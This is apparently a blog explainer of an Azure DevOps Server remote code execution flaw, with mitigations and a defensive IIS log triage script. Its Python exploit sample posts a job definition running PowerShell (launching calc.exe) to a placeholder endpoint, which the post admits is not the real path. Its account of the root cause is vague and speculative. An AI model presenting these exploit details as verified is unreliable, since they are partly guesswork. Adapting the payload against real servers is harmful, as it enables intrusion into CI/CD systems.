CVE-2023-38155 - Azure DevOps Server RCE Explained – Full Guide to the Vulnerability and Exploitation
In August 2023, Microsoft patched a serious security flaw known as CVE-2023-38155 in Azure DevOps Server that could let attackers run their own code on vulnerable servers—Remote Code Execution (RCE). Anyone managing on-premises Azure DevOps or Team Foundation Server (TFS) should get to know this bug, patch ASAP, and understand how it works.
What’s Azure DevOps Server?
Azure DevOps Server (formerly TFS) is Microsoft’s on-premises CI/CD, source control, and project management platform. Enterprises use it to store source code, build apps, and manage workflows. If someone gets control of a DevOps Server, they could potentially access ALL your code and deployments.
What is CVE-2023-38155?
CVE-2023-38155 is a bug in how Azure DevOps Server processes certain web requests. A remote attacker can send crafted HTTP messages to the server, which then mishandles them and allows the attacker to run code—like dropping a backdoor or stealing source code—without any need for valid credentials.
The vulnerability is triggered via a flaw in the management of job execution or task deserialization. If exploited, the attacker can get SYSTEM privileges.
How the Exploit Works
The root cause is typically improper input handling or unsafe deserialization. Attackers use custom HTTP requests to interact with the job agent or task runner endpoints. By feeding crafted data, they force the server to load and execute malicious commands.
Sample Exploit Code (Python)
Below is a simplified proof-of-concept to demonstrate sending a crafted payload. Never use this against systems you don't own!
```python
import requests

# Example endpoint only; the real path is not given here.
url = "http://vulnerable-devops-server:808/_apis/v1/Job/Run"

# Crafted job definition that asks the server to run a PowerShell step
malicious_payload = {
    "jobDefinition": {
        "steps": [
            {
                "task": {
                    "id": "powershell",
                    "inputs": {
                        "script": "Write-Host 'CVE-2023-38155 exploited'; Start-Process calc.exe"
                    }
                }
            }
        ]
    }
}

# Send the payload and show how the server responded
response = requests.post(url, json=malicious_payload, timeout=10)
print(response.status_code, response.text)
```
*Note: The exact endpoint and payload format might vary and are usually discovered by reviewing the patched code, API docs, or reverse engineering patches.*
Potential Impact
- Lateral movement: Use the DevOps server as a base to attack other systems on the network.
- CI/CD pipeline poisoning: Inject malware into software builds.
Mitigation
- Install the security updates listed in Microsoft’s advisory:
  - Microsoft Security Update Guide: CVE-2023-38155
  - Download Updates
- Use network segmentation.
- Limit access to your CI/CD infrastructure.
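The last two mitigations (segmentation and restricting who can reach the server) are only useful if you can tell when they are being bypassed. The script below is an added example, not code from the original post or from Microsoft: it triages IIS W3C access logs from an Azure DevOps Server host and flags requests that arrive from outside an assumed allowlist of CI/CD subnets, or that POST to the REST API (`/_apis/`) without an authenticated user. The log lines, the allowlist and the `/_apis/v1/Job/Run` path (the post's own example endpoint) are all constructed sample data, so the script runs offline.

```python
import ipaddress
from dataclasses import dataclass
from typing import Dict, Iterator, List

# Constructed sample IIS W3C log (not from a real server). IIS writes
# spaces inside field values as '+', so every field is a single token.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2023-09-12 17:20:01 10.0.5.10 GET /tfs/DefaultCollection/_apis/projects - 8080 CORP\\jdoe 10.0.5.44 Mozilla/5.0 200
2023-09-12 17:20:07 10.0.5.10 POST /tfs/DefaultCollection/_apis/build/builds - 8080 CORP\\buildsvc 10.0.6.12 VSTS-Agent 200
2023-09-12 17:21:13 10.0.5.10 POST /_apis/v1/Job/Run - 8080 - 203.0.113.77 python-requests/2.31 500
2023-09-12 17:21:14 10.0.5.10 POST /_apis/v1/Job/Run - 8080 - 203.0.113.77 python-requests/2.31 500
2023-09-12 17:25:40 10.0.5.10 GET /tfs/_static/app.css - 8080 - 10.0.5.44 Mozilla/5.0 200
"""

# Assumed allowlist: the only subnets that should ever reach the
# DevOps server (your segmentation policy, expressed as CIDRs).
ALLOWED_NETWORKS = [
    ipaddress.ip_network("10.0.5.0/24"),
    ipaddress.ip_network("10.0.6.0/24"),
]


@dataclass
class Finding:
    time: str
    client_ip: str
    method: str
    uri: str
    reasons: List[str]


def parse_w3c(text: str) -> Iterator[Dict[str, str]]:
    """Yield one dict per log record, keyed by the names in the #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed or truncated record; skip rather than guess
        yield dict(zip(fields, parts))


def triage(text: str, allowed=ALLOWED_NETWORKS) -> List[Finding]:
    """Flag records that violate the access policy or hit the API anonymously."""
    findings = []
    for rec in parse_w3c(text):
        reasons = []
        ip = ipaddress.ip_address(rec["c-ip"])
        uri = rec["cs-uri-stem"]
        if not any(ip in net for net in allowed):
            reasons.append("source outside allowed CI/CD networks")
        # IIS logs '-' for cs-username when the request was not authenticated.
        if rec["cs-method"] == "POST" and "/_apis/" in uri and rec["cs-username"] == "-":
            reasons.append("unauthenticated POST to REST API")
        if reasons:
            findings.append(Finding(rec["time"], rec["c-ip"], rec["cs-method"], uri, reasons))
    return findings


def by_source(findings: List[Finding]) -> Dict[str, int]:
    """Count flagged requests per client IP, so repeat offenders stand out."""
    counts: Dict[str, int] = {}
    for f in findings:
        counts[f.client_ip] = counts.get(f.client_ip, 0) + 1
    return counts


if __name__ == "__main__":
    for f in triage(SAMPLE_LOG):
        print(f.time, f.client_ip, f.method, f.uri, "; ".join(f.reasons))
    print(by_source(triage(SAMPLE_LOG)))
```

Authenticated traffic from the build subnets passes cleanly, while the two anonymous POSTs from an address outside the allowlist are reported twice over (wrong network and no user). Point the script at real logs by swapping `SAMPLE_LOG` for the file contents and `ALLOWED_NETWORKS` for your own segmentation policy; if the server sits behind a reverse proxy, log and parse the forwarded client address instead of `c-ip`.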
References
- Microsoft Security Advisory
- CVE Details for CVE-2023-38155
- DevOps Security Blog: Azure DevOps Vulnerabilities
- Example public exploit writeups and discussions via GitHub, Exploit-DB (be careful and read responsibly).
Final Thoughts
CVE-2023-38155 is a critical reminder to treat your DevOps infrastructure as a core asset—keep it patched, locked down, and monitored. Attackers love to exploit CI/CD pipelines because they have the "keys to the kingdom." Don’t let this one sneak by you!
If you’re running or supporting Azure DevOps Server, update now and audit your configs.
*Stay safe, keep patching, and follow trusted sources for timely updates on vulnerabilities like this.*
Timeline
Published on: 09/12/2023 17:15:00 UTC
Last modified on: 09/12/2023 21:15:00 UTC